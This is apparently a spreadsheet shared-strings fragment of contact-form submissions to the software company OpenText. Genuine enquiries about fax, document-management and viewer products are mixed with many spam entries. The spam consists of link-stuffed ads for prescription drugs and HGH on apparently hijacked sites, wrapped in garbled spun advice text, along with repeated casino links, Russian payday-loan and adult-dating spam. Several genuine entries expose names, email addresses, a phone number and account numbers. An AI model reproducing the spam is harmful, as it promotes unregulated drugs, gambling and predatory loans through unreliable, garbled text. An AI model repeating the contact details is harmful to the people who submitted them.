  [url=http://www.klimalitabut.com/care/system.asp?m=202-Kamagra-Jelly-Oral-Generisk-Viagra-Biverkningar-Kamagra-Oral-Jelly-Farligt]Kamagra Jelly Oral[/url]_x000D_
 Ladies throughout the world have lived with infections through the path of time. Several might have assumed the specific situation to be an inevitable unwanted effect of being women. Fortunately, a number of basic, powerful strategies exist that can free ladies of this particular pain and irritation for good. Using the recommendations within the preceding report is the best way to commence.Possess A Grey Experience With Red wine Utilizing These Tips_x000D_
  [url=http://www.beselektrik.com.tr/css/biller.asp?pt=387-Viagra-FÃ¶r-MÃ¤n-Lovegra-FÃ¶r-Kvinnor-Viagra-Sverige-Snabb-Leverans/]Viagra FÃ¶r MÃ¤n[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear sir, we are doing business with sonix for oid pen , we print the books by ourself and then sell to customer pen and our books together. But now we want to start new project with pen that just read normal books” not coded books” . But for beginning we want it read just numbers from 0 to 2000 “ size maximum 1.5 cm” and 2000 documents “ size maximum 3cm” and after read it “ by camera or scan document” find similar photo from library and just play the sound “ attached files are same az photo”  This is all of my request. If you can help me for writing software “sdk” on this field or help me for suitable hardware for this project plz tell me.                                Best regards...    moradian </t>
  </si>
  <si>
    <t xml:space="preserve">We are looking at replacing our physical fax machine and improving our work process. Need more information on OpenText RightFax to Email, is this a standalone product or is it a feature of the RightFax solution? _x000D_
We are also working with our HQ on VIM implementation sometime later this year, does this complement with VIM to receive incoming invoices._x000D_
Thanks for your time! </t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://casino24list.com/]online gambling casino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games real money&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>Dear Team,_x000D_
 _x000D_
Harsh Chovatia name of the colleague with email id harsh.chovatia@tcs.com  who already has a Knowledge Center Account and/or logs technical tickets_x000D_
 _x000D_
Please find below details as requested_x000D_
Account - Tata Consultancy Services_x000D_
System- Documentum Content Server_x000D_
Product Line - Documentum _x000D_
Application - Documentum Content Server_x000D_
END USER CODE- EU0170439_x000D_
ContractID - 935931D_x000D_
​Please provide Knowledge Center and My support Account to my account.</t>
  </si>
  <si>
    <t>I am not able to login to my support._x000D_
it gives no access even after confirmation of the email_x000D_
_x000D_
Please help urgent</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://casino24list.com/]slot online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games real money&lt;/a&gt; _x000D_
cassino</t>
  </si>
  <si>
    <t>Hi, We want to upgrade our Documentum webtop v6.8 to the latest version 16.4. Can you please let us know an approximate cost for the licensing involved in this? Thanks!</t>
  </si>
  <si>
    <t>Bom dia, sou estudante e realizei o download da versão de teste do OpenText mas gostaria de saber o valor de uma licença do software, pois, tenho interesse em continuar utilizando-o para estudos._x000D_
_x000D_
Aguardo retorno._x000D_
Obrigado.</t>
  </si>
  <si>
    <t>I wanted to know about career in your organisation. I am a college student and open text is coming for drive, wanted to know about it.</t>
  </si>
  <si>
    <t>[url=https://tatarsk.nikola48.ml/zaymydlyaip/157-poluchit-zaym-pod-zalog-pts.html]РїРѕР»СѓС‡РёС‚СЊ Р·Р°Р№Рј РїРѕРґ Р·Р°Р»РѕРі РїС‚СЃ - РўР°С‚Р°СЂСЃРє[/url] _x000D_
[url=https://kamyzyak.konga-zajm.gq/zaymdlyaooo/218-nabral-ochen-mnogo-zaymov-ne-mogu-rasplatitsya.html]РЅР°Р±СЂР°Р» РѕС‡РµРЅСЊ РјРЅРѕРіРѕ Р·Р°Р№РјРѕРІ РЅРµ РјРѕРіСѓ СЂР°СЃРїР»Р°С‚РёС‚СЊСЃСЏ - РљР°РјС‹Р·СЏРє[/url] _x000D_
[url=https://kirovgrad.blic-zajm.cf/pogashenie/188-zaymy-s-plohoy-kreditnoy-istoriey-onlayn-na-kartu-maestro.html]Р·Р°Р№РјС‹ СЃ РїР»РѕС…РѕР№ РєСЂРµРґРёС‚РЅРѕР№ РёСЃС‚РѕСЂРёРµР№ РѕРЅР»Р°Р№РЅ РЅР° РєР°СЂС‚Сѓ РјР°СЌСЃС‚СЂРѕ - РљРёСЂРѕРІРіСЂР°Рґ[/url] _x000D_
[url=https://shakhunya.zanyat-bystro-dengi.ga/bezzvonkov/176-beri-zaym-ru.html]Р±РµСЂРё Р·Р°Р№Рј СЂСѓ - РЁР°С…СѓРЅСЊСЏ[/url] _x000D_
[url=https://vysock.zajm-nalichnymi.tk/podzalogpts/149-zaym-s-plohoy-kreditnoy-istoriey-bezrabotnym.html]Р·Р°Р№Рј СЃ РїР»РѕС…РѕР№ РєСЂРµРґРёС‚РЅРѕР№ РёСЃС‚РѕСЂРёРµР№ Р±РµР·СЂР°Р±РѕС‚РЅС‹Рј - Р’С‹СЃРѕС†Рє[/url] _x000D_
[url=https://kokuy.zaim-bez-problem.gq/ispravlenieki/126-denezhnye-zaymy-na-kartu-na.html]РґРµРЅРµР¶РЅС‹Рµ Р·Р°Р№РјС‹ РЅР° РєР°СЂС‚Сѓ РЅР° - РљРѕРєСѓР№[/url] _x000D_
[url=https://nazarovo.vebbankir-zajm.ga/10000rubley/77-zaym-na-vremya-prodazhi-kvartiry.html]Р·Р°Р№Рј РЅР° РІСЂРµРјСЏ РїСЂРѕРґР°Р¶Рё РєРІР°СЂС‚РёСЂС‹ - РќР°Р·Р°СЂРѕРІРѕ[/url] _x000D_
[url=https://krukovo.pajps-zajm.cf/onlayn/169-obrazec-kak-pravilno-sostavit-raspisku-o-zayme-deneg.html]РѕР±СЂР°Р·РµС† РєР°Рє РїСЂР°РІРёР»СЊРЅРѕ СЃРѕСЃС‚Р°РІРёС‚СЊ СЂР°СЃРїРёСЃРєСѓ Рѕ Р·Р°Р№РјРµ РґРµРЅРµРі - РљСЂСЋРєРѕРІРѕ[/url] _x000D_
[url=https://luchegorsk.nikola46.gq/vdenobrascheniya/228-zaymy-onlayn-na-kartu-na-dolgiy-srok.html]Р·Р°Р№РјС‹ РѕРЅР»Р°Р№РЅ РЅР° РєР°СЂС‚Сѓ РЅР° РґРѕР»РіРёР№ СЃСЂРѕРє - Р›СѓС‡РµРіРѕСЂСЃРє[/url] _x000D_
[url=https://zelenogorsk.zajm-bez-procentov.tk/zayavkivovsekompanii/231-zaym-ot-organizacii-organizacii.html]Р·Р°Р№Рј РѕС‚ РѕСЂРіР°РЅРёР·Р°С†РёРё РѕСЂРіР°РЅРёР·Р°С†РёРё - Р—РµР»РµРЅРѕРіРѕСЂСЃРє[/url] _x000D_
[url=https://solikamsk.tendernyj-zajm.cf/bezspravok/103-mirovoe-soglashe</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to find pricing for a document management solution.  </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
May I have a quote for exceed version 15?_x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t>I have Rightfax requirements and I would like to know who is your local distributor.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.bestdeathbenefitpolicy.co.uk/Account/content.asp?have=41-Ansomone-Hgh-Dosage-Jintropin-Hormone-De-Croissance-Prix-Hgh-Prix-Maroc.html]Ansomone Hgh Dosage[/url]_x000D_
 While you are applying to businesses internet and they react to you, make sure that you communicate with them instantly to set up a conversation. Almost never will a company wait on you, as you will have to take the initiative to get this done. This helps to create oneself up on an meet with and probably your upcoming long lasting work._x000D_
  [url=http://www.nigdehalikilim.com/images/back.asp?b=122-Gh-Revolution-Hormona-Jintropin-Precio-Igf-1-Lr3-Dosage/]Gh Revolution[/url]_x000D_
 If your arms are uncovered due to a strapless wedding dress, keep these out of your physique for your photos. Bare biceps and triceps which can be held limited towards your whole body will make them seem bulkier. In comparison, if you keep your hands a little away from your system, it can use a slimming impact. Caused by by using this basic method is stunning photos in your special event._x000D_
  [url=http://www.especialityinternational.com/css/table.asp?much=475]Viagra Barata[/url]_x000D_
 Make sure to get ample exercising so you are going to do the right forms of physical exercise. Individuals with joint inflammation should choose exercises that assistance and strengthen the joint parts, such as fishing, as an alternative to workouts that injury them, like jogging. Neglecting to exercise may also greatly increase joints firmness and pain._x000D_
  [url=http://www.iamkuzmichev.com/css/center.asp?left=29]Jintropin Hgh Results[/url]_x000D_
</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casino24list.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>casino online _x000D_
[url=http://casino24list.com/]kasino[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>I need to secure a copy of the document that I faxed to the file_x000D_
document number:  0541000181006496102</t>
  </si>
  <si>
    <t>need to have my account associated with the same support contract number as Rajendar Chiluka - j.reddy@samsung.com</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casino24list.com/]casino games[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;slot online&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>I am evaluating OpenText capability to integrate with Sharepoint Online and OneDrive.  We are an OpenText client currently using Content Server and Enterprise Connect but would like to bring our SharePoint content into our OpenText ECM.</t>
  </si>
  <si>
    <t xml:space="preserve">I am configuring rightfax integration with a cisco voip environment._x000D_
Can you please supply me with the latest integration configuration guide?_x000D_
_x000D_
PSTN-SIP-Gateway(cisco cube)-SIP-CUCM-SIP-RightFax_x000D_
_x000D_
Please let me know._x000D_
Thanks!_x000D_
</t>
  </si>
  <si>
    <t>As you are one of the Regions biggest and best businesses, I would like to ask for your support in hte JDG Memorial Open!_x000D_
_x000D_
The James Dale Greer golf tournament is to remember a former Kitchener resident who tragically lost his life Christmas 2015, and to raise money for a charity close to his heart, Big Brothers/Big Sisters of Waterloo Region. All proceeds go to Big Brothers Big Sisters._x000D_
_x000D_
Please let me know if it is something you are interested in or if there are any other channels i can go through to gain support.  Thank you,_x000D_
_x000D_
Barry McFadyen</t>
  </si>
  <si>
    <t>Potential fax funding solution</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.gokaydenizcilik.com.tr/Css/teacher.asp?footer=149]Hgh Shop[/url]_x000D_
 Make sure you utilize your precautionary inhaler that is certainly recommended through your medical professional. Be aware that a protective inhaler is distinct compared to a recovery inhaler, which is often used during an acute strike. A preventive inhaler, on the flip side, dispenses medicine made to keep your air flow flowing, which reduces intense attacks._x000D_
  [url=http://www.carnilove.fr/content/font.asp?color=137]Viagra Cialis[/url]_x000D_
 Use a steady and professional colour plan in your email marketing promotion. Nothing will affect a far more visible chord in your subscriber's heads. Believe for your private favorite companies, along with their colors come to mind easily. Lookup your favorite Online search motor for colour strategies, and you could quickly find 1 appropriate for your sector, or perhaps distinctive inside it._x000D_
  [url=http://www.globusme.com/img/prick.asp?main=106]Cialis Online Bestellen Paypal[/url]_x000D_
 To sum up, there is certainly absolutely nothing far more that you want than to find the best ways to deal with your tooth so that you have a remarkable laugh. Your look can make or bust a first effect, therefore it is good you are fascinated. Hopefully, the recommendations right here will allow you to out!Receive The Vibrant Grin You Might Have Been Following_x000D_
  [url=http://www.despachantefranco.com.br/demo/holi.asp?ule=40]Jintropin Uk[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">How much do you charge for sending and receiving 25-100 faxes per month? </t>
  </si>
  <si>
    <t xml:space="preserve">I am working with civil society organizations in an effort to map SDG between national, provincial and local objectives. Who could I talk to explore the possibility of using ProVision to map this effort? </t>
  </si>
  <si>
    <t>We're interested in implementing the Documentem CMIS. How can we get started?</t>
  </si>
  <si>
    <t>looking for login information user and password for trial information hub for the url:_x000D_
http://localhost:8700/iportal/login.do_x000D_
_x000D_
'administrator' without password doesn't work</t>
  </si>
  <si>
    <t>Dear Friends,_x000D_
_x000D_
I work for CuriOdyssey, a serious science playground and zoo in San Mateo serving over 100,000 young visitors each year. We have a unique event sponsorship opportunity that I’d love to discuss with you to see if it is a fit with OpenText’s philanthropic priorities._x000D_
_x000D_
We have a television personality connected with conservation and wildlife causes who would love to come and give a presentation for the community, but we need a little help finding the budget to bring him out from the East Coast. Would you be open to a quick phone call to discuss further?_x000D_
_x000D_
I look forward to hearing from you._x000D_
_x000D_
All the best,_x000D_
Alex Shwarzstein</t>
  </si>
  <si>
    <t>kasino _x000D_
[url=http://casino24list.com/]online casino slots[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games slots&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>I received a Legal Claimant Service form that I need assistance with._x000D_
Best,_x000D_
Andrew J Malik</t>
  </si>
  <si>
    <t>We currently have Captiva version 7.1 and App Extender version 6.5, we are looking to move away from our 3rd party supplier. Do you guys offer upgrades and support directly or do you require a 3rd party for this? If 3rd party is required who do you recommend in the Twin City Metro area for Minnesota? Thank you.</t>
  </si>
  <si>
    <t>Interest in Digital Asset Management solution</t>
  </si>
  <si>
    <t>Would like to receive a quote via email on upgrading from TeleForms to OpenText.</t>
  </si>
  <si>
    <t xml:space="preserve">I am wondering what has happened to all of FirstClass e-mails through my other e-mail account with Concordia University. I seem to be missing all of my e-mails from January 2010 to October 24th, 2014, from my FirstClass account at Concordia University; which continues to be a FirstClass client. </t>
  </si>
  <si>
    <t xml:space="preserve">Need urgent help to support existing clients... </t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team,_x000D_
_x000D_
Greetings of the Day !._x000D_
_x000D_
We would like explore on the Archiving and Document management product, Opentext product and its features. Could we get some reference on below topics from SAP from sales prospective._x000D_
_x000D_
_x000D_
a.	Product roadmap._x000D_
b.	Features and comparisons with other ECM vendors._x000D_
c.	Licencing model – product, software, memory and support model._x000D_
d.	Benefits with Cloud vs On-promises._x000D_
e.	Archiving and Document management capabilities._x000D_
_x000D_
_x000D_
Mit freundlichen Grüßen / Kind Regards,_x000D_
Ravi Neelagiri_x000D_
</t>
  </si>
  <si>
    <t>installing and configuring right fax express.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.krebsteknik.dk/images/libraries.asp?we=517]MÃ©dicament Generique Viagra[/url]_x000D_
 An essential suggestion to take into consideration regarding raising a child is to make certain that you produce a structure for your little one to have and operate under. This is very important which means your little one discovers to stick to a routine, and so that their body are able to get sufficient relaxation and procedure the meals they eat properly._x000D_
  [url=http://www.nilayislek.com/common/director.asp?zp=439]Viagra Generic Name[/url]_x000D_
 A great dietary idea would be to sign up for a publication devoted to diet. There are plenty of books around that offer fascinating tasty recipes, along with, the newest information regarding health insurance and nourishment. Developing a diet publication like this, could make cooking in the home, far more interesting._x000D_
  [url=http://www.normsan.com/care/cache.asp?page=353]Duree Efficacite Levitra[/url]_x000D_
 Consider whether the wines must age group. If you are looking for anything to get within the next few days, take into consideration that it does not say around the package whether the wines should sit with your cellar for many years. Request somebody to the wine that are prepared to be opened instantly._x000D_
  [url=http://www.yesautohazare.com/footer/power.asp?gu=66-Cialis-Farmacia-Madrid-Cialis-5-Mg-Andorra-Cialis-Madrid-Sin-Receta/]Cialis Farmacia Madrid[/url]_x000D_
</t>
  </si>
  <si>
    <t>We are conducting an RFP for automating our bidding on U.S. Government contracts. You are listed as a Value-Added Network (VAN) by the DLA and we therefore like to include you in the RFP. Please let me know who I should send the details of the RFP to.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://lastnewstoday.ru/pr/adult][img]http://lastnewstoday.ru/pr/adult/images/9068b248538e.jpg[/img][/url] _x000D_
 _x000D_
[url=http://lastnewstoday.ru/pr/adult]мобильные знакомства моя страница[/url] _x000D_
 _x000D_
Онлайн клуб знакомств для интимных встреч. лучшие встречи с противоположным полом для удовлетворения фантазий у тебя городе. Не проходи мимо - не останешься равнодушным! _x000D_
 _x000D_
 амур знакомства, знакомства 35 лет, знакомства для пожилых, агентство знакомств, баду знакомства на русском, знакомства ru мобильная версия, знакомства в архангельском, знакомства девушками город, сайт знакомств в питере без, цель знакомства, самые популярные знакомства, сайт знакомств в питере без регистрации, знакомства воронеж бесплатная регистрация, барнаул знакомства без, знакомства мамба бесплатно без, знакомства без встреч, секс знакомства порно, татарлав знакомства, секс знакомства видео, тв знакомства, знакомства бесплатно нижний, знакомства атолин, знакомства мамба бесплатно без регистрации, tabor сайт знакомств моя страница, табор сайт знакомств моя страница войти, презентация знакомство с классом, знакомства любим, tabor ru знакомства мобильная, tabor ru сайт знакомств моя страница, сайт знакомств com, знакомства во владимире, бибу знакомства, биба знакомства, смотреть знакомство с факерами, гей знакомства нижний, баду сайт знакомств моя страница, атолин сайт знакомств, знакомства набережные, сайт мамбо знакомство, инвиктори христианские знакомства, реальный сайт знакомств, сайт знакомств онлайн, знакомства барнаул бесплатно, знакомства пенсионеров, пышка знакомства, знакомства замуж, сайт знакомств ростов на дону, гей знакомства волгоград _x000D_
</t>
  </si>
  <si>
    <t>Hi there! Need to buy your EDI solution for small enterprises. Could you contact me ? My phone is +55 47 98406-1693  Ronie</t>
  </si>
  <si>
    <t xml:space="preserve">I have questions about license renewal for our existing Rightfax software or support contract or quotes on Rightfax Managed Services. </t>
  </si>
  <si>
    <t>I am trying to purchase Brava! Desktop CXL-N but when I get to the payment screen on PayPal I get an error message. Please help?</t>
  </si>
  <si>
    <t>Support contract</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Good afternoon_x000D_
 _x000D_
My name is Katie Jones and I work for a management consultancy firm called MasonBreese, based in Jersey (Channel Islands)._x000D_
 _x000D_
We are currently designing a solution for a client, to ultimately digitise their invoicing process._x000D_
 _x000D_
Consequently, we are assessing external providers of workflow automation and have come by your website._x000D_
 _x000D_
With our client, there would be around 250,000 invoices needing to be processed per year. _x000D_
_x000D_
The idea is that invoices could be captured (received by email or manually scanned), automatically stored into an area from which to be converted (using OCR technology), preserved in an accessible storage location as a PDF, and also processed through to accounts, whereby the data would be automatically recorded in the correct ledger. _x000D_
_x000D_
I would appreciate you providing some information about the products you are offering, and to what extent they can be customised as we may require._x000D_
_x000D_
I do hope this makes sense and I look forward to hearing from you._x000D_
_x000D_
Thanks in advance._x000D_
_x000D_
Kind regards_x000D_
_x000D_
Katie Jones | Business Analyst _x000D_
_x000D_
24 Hill Street, St Helier, Jersey, JE2 4UA _x000D_
katie.jones@masonbreese.com_x000D_
</t>
  </si>
  <si>
    <t>I need access to "My Support".  I had it and now it's saying I don't.  I requested the confirmation email and got it.  When I click on the link it takes me to the same page from before that Says "Almost There" request access.</t>
  </si>
  <si>
    <t>Demo of your OpenText product</t>
  </si>
  <si>
    <t>we need to try D2 mobile on our premises</t>
  </si>
  <si>
    <t>online casino _x000D_
[url=http://casino24list.com/]casinos online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino slots&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://casino24list.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;cassino&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>We want to port our existing fax line number to a fax to email service</t>
  </si>
  <si>
    <t xml:space="preserve">Hello and Good Day_x000D_
_x000D_
I am Max,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Max Williams_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We have been using the free version of Brava Reader for some time and have been notified that we will have to start using the paid version. We mainly use the service for pdf files, in which we require the measuring tool. We are unsure as to which version of Brava we require, could you advise with this? My best point of contact is through the e-mail address attached. Thank you. </t>
  </si>
  <si>
    <t>_x000D_
Hi,_x000D_
_x000D_
Will this cource be avaiable in Europe also ? or can we still join from Europe in the "Virtual Classroom"_x000D_
_x000D_
3-3730 OpenText Exstream Communication Server System Administration v16.3_x000D_
_x000D_
Best regards Ola</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We’re looking for tools for sentiment analysis of texts. We want to apply them to discover the sentiment behind our clients' profiles (our clients are companies), and the comments they receive on their social media. We look for a tool with the following requirements:_x000D_
_x000D_
Give a quantitative measurement of the sentiment._x000D_
Works with an automatic API_x000D_
Works as a cloud service_x000D_
Allow the analysis of social media data (comments, likes, etc)_x000D_
Allow the analysis of texts in spanish_x000D_
_x000D_
Additionally, we want to know the following:_x000D_
How many texts can we analyze per unit time (daily, weekly, monthly, etc)_x000D_
Which are your prices?_x000D_
_x000D_
Thank you for your time._x000D_
Have a good one !</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We're interested in the sentiment analysis tool. We want to evaluate the sentiment behind our clients' description, and the comments they receive on their social media. We want to know if your API is automatic, if your service is available on cloud, and if the API can analyze texts in spanish._x000D_
_x000D_
Finally, it would be great to know about your prices and the volume of data (number of documents) we can analyze with your software._x000D_
_x000D_
Thank you and have a good one !</t>
  </si>
  <si>
    <t>I'm trying to set a password on our central support account that has been setup by OpenText. Whatever password I type, the page fails to set the password with 'Update Password Failed'. _x000D_
_x000D_
Our support account is Recommind_Tickets@mills-reeve.com_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Piers..</t>
  </si>
  <si>
    <t xml:space="preserve">Hej,_x000D_
Ni skickar fakturor till fel postadress. Det ska skickas till:_x000D_
Volvo Car Retail Solution AB_x000D_
Valdemar Norens gata 3_x000D_
405 31 Göteborg_x000D_
 Kundnr: 10205289_x000D_
Tack på förhand,_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Need quotation for RightFax is v16 Enhancement Pack 2 Service_x000D_
(Quantity unlimited)</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, _x000D_
I would know the costs and the actions related to OpenText Extended ECM for SAP implementation. We have: _x000D_
- Archive Server (integrated with SAP and Scanning solution)_x000D_
- Content Server with SAP DMS (Document Management System) Solution Accelerator (to be confirmed)_x000D_
Is it possible to have more information about the architecture and its implementation? _x000D_
Thank you_x000D_
Emilia_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
Ich beschäftige mich aktuell im Rahmen einer Evaluierung mit verschiedenen Faxprodukten auf Cloud-Basis._x000D_
Bei der Recherche bin ich auch auf Ihr Produkt Fax2Mail gestoßen._x000D_
_x000D_
Die Webseite hat bereits einen Großteil meiner Kriterien beantwortet, dennoch habe ich noch eine Frage:_x000D_
Gibt es die Möglichkeit, eigene Faxnummern in Ihre Umgebung zu übernehmen?_x000D_
_x000D_
Mit freundlichem Gruß / Best regards _x000D_
Moritz Hagedorn_x000D_
Auszubildender - Fachinformatiker für Systemintegration_x000D_
_x000D_
Hellmann Worldwide Logistics SE &amp; Co. KG _x000D_
Elbestrasse 1 _x000D_
49090 Osnabrueck _x000D_
Germany</t>
  </si>
  <si>
    <t>Can you give me a quote for Brava Reader (TIFF viewer), network version for 40 seats please.</t>
  </si>
  <si>
    <t xml:space="preserve">Information about the purchase of 10 licenses for Brava Reader Desktop TX. Paypal could not process that many items. There is a error that keeps saying Paypal is down. If I try reducing it to 5 items then it goes through. Please advise a payment method which does not goes through Paypal. _x000D_
Also few questions about installation. It says it requires a server. Is the server suppose to be physically on-site in the client's location? Will there be instructions for installation after purchase? Thank you.  </t>
  </si>
  <si>
    <t>Hi, I am a new employee at Hafslundtellier and I want to register myself with full access to my support but I do not have all details to fill out a complete form. We use open Text Extream, but I have no "END user Number" and "System ID/Serial Number/PIN/VPS", My Coworker is Tomas Krivjansky. I hope you can help me with this. _x000D_
BR Steven Sæveland</t>
  </si>
  <si>
    <t>We want to know what is latest version of EDOCS application and I also want to know if it can be support in Azure cloud</t>
  </si>
  <si>
    <t xml:space="preserve">Enquiry on Opentext integration capability for implementing a gateway in china project </t>
  </si>
  <si>
    <t>I need 25 license of Brava Reader. kindly suggest on same.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are implementing Oracle ERP Cloud and are looking for the AP Invoice automation solution. Do you have anything to offer?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Our need MFT solution. Who is the Turkey partner? We want to POC for OpenText MFT.</t>
  </si>
  <si>
    <t xml:space="preserve">Лучшие новостные заголовки СМИ за 2017 год: _x000D_
Сонный хомяк оставил без интернета два села в Житомирской области _x000D_
Блоги о недвижимости _x000D_
[url=https://planetaryambience.tumblr.com/]Источник: Блог о недвижимости...[/url]|_x000D_
[url=https://pinkpastelphan.tumblr.com/]Источник: Блог о недвижимости...[/url]|_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have tried the Free Brava version for PDF and CAD files but will be expiring soon. I am interested to purchase the Brava Desktop version that can view, measure, annotate and print PDF and CAD files._x000D_
_x000D_
With the above requirements, I would like to request for a quotation including maintenance for 18Nr users._x000D_
_x000D_
Hoping to receive the proposal the soonest._x000D_
_x000D_
Thanks._x000D_
_x000D_
Regards,_x000D_
Sheila</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ecmaindia.in/css/export.asp?mpgid=283]Comprar Levitra 10 Mg[/url]_x000D_
 Backyard peas needs to be picked when pods are fairly effectively completed and are nevertheless vibrant natural. Decide on a couple of peas and eat them raw. They ought to preference sugary and tasty. Should you persistently choose backyard peas while they older, you can expect to boost your production at harvest time, which is typically one or two days._x000D_
  [url=http://www.horemansinterieur.be/Images/class.asp?WPID=456]Generika Viagra Rezeptfrei[/url]_x000D_
 In case you are taking care of a residence development project, you might want to possess some songs actively playing. A lot of people do, but don't use earphones. This may affect your ability to listen to something that you might need to pick up._x000D_
  [url=http://www.effi-shoshani.com/fm/kontakt.php?i=422]Viagra 100mg Buy Online[/url]_x000D_
 When you can, do not blow dry your own hair too frequently and you should not coloration the hair often. Both these may cause your own hair to dry, destroying it along the way. If the products have already dehydrated your own hair out, you should use coconut oil twice a 7 days to include humidity._x000D_
  [url=http://www.exclusivecocktails.co.uk/includes/red.php?food=250]riptropin hgh results[/url]_x000D_
</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://casino24list.com/]online casino gambling[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;play casino games online&lt;/a&gt; _x000D_
kasino</t>
  </si>
  <si>
    <t>To whom it may concern,_x000D_
_x000D_
We are writing to inquire if your organization would like to sponsor the Waterloo Math Team in attending the American Regional Mathematics League (ARML) contest in early June (June 1st - 2nd this year). The Waterloo Math Team is a group of the best high school math students from Kitchener-Waterloo and the surrounding region._x000D_
_x000D_
The team meets weekly to work through practice contests, lessons, and problem sets drawn from a variety of sources, including compilations of past contests (ARML, AMC, AIME, etc.) and more general math books (including Introduction to Combinatorics by Richard A. Brualdi and several of the AwesomeMath books by Titu Andreescu). Started in 2014 by a group of enthusiastic math students at Waterloo Collegiate Institute it has participated in the ARML contest every year since its inception. The team has since expanded as far as Guelph and remains primarily student-driven._x000D_
_x000D_
ARML is an international math contest in which high school students compete in teams of fifteen. It is widely renowned and one of the largest math competitions in the United States, with teams from all over North America travelling to four competition sites across the US, and almost 2000 students competing annually. Everyone attending with the Waterloo Math Team will be wearing the team shirt (on which sponsors and team branding are displayed) for the duration of the contest, and interacting with the many thousands of other students and coaches._x000D_
_x000D_
Despite being highly motivated, as high school students such a trip is difficult to fund. We estimate the baseline cost for the whole trip at around $6000 for the entire team, coming out to $400 per student at best, and need to have all final payments in at the beginning of May 2018. Any contributions would be greatly appreciated. We are happy to meet in person to discuss details of the sponsorship._x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Emily Yu and Henry Hu</t>
  </si>
  <si>
    <t>Need pricing on development licenses for Documentum and LiveLink in a VM environment.</t>
  </si>
  <si>
    <t xml:space="preserve">Contacting for a Mongodb DBA position </t>
  </si>
  <si>
    <t>Hi, I'm looking for the latest eRoom SMB installer. Thanks.</t>
  </si>
  <si>
    <t>Hello. And Bye [url=http://bit.ly/2HJgff8]Link[/url].</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://casino24list.com/]slot online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;cassino&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t xml:space="preserve">Account had been closed, but now payment has been made, but I am still not able to login to the Open Text active catalogue._x000D_
Network ID: MV563_x000D_
User ID: MV563B_x000D_
accountId=128432168386_x000D_
</t>
  </si>
  <si>
    <t>We are an apparel vendor, and would like to create an account /</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://casino24list.com/]online casino slots[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;cassino&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>Will you notify me about who the Account Executive is for our account?  Thank you, -MK</t>
  </si>
  <si>
    <t xml:space="preserve">viagra 20mg canada jump to_x000D_
 [url=http://glviagragtr.com]viagra sale_x000D_
[/url]  viagra, viagra, genuine_x000D_
 &lt;a href="http://glviagragtr.com"&gt;viagra sale_x000D_
&lt;/a&gt; - levitra versus viagra_x000D_
 prices viagra_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are a current RightFax customer but would like to move our faxing to a managed RightFax solution or at least the hybrid solution. </t>
  </si>
  <si>
    <t xml:space="preserve">My userid appears to be locked up and when I try to reset the link is not working.  Can you please assist  Group is SAKS and userid is lscheider.   Also, could you provide the list of active users that we have?  Many of the people are no longer with the company and we need a few new users added.  Thanks!_x000D_
</t>
  </si>
  <si>
    <t>I would like to know the price of having eDOCS for Microsoft SharePoint. We are 30 attorneys. Please send me the information by email. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://mariobcba62738.suomiblog.com/-5123005]Here[/url]|_x000D_
</t>
  </si>
  <si>
    <t>I received notice my SMS is expiring in June. We negotiated the terms for license and maintenance in June 2015. Now that you have been purchased by OpenText does the agreement remain the same or do we have to renegotiate?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Sandy</t>
  </si>
  <si>
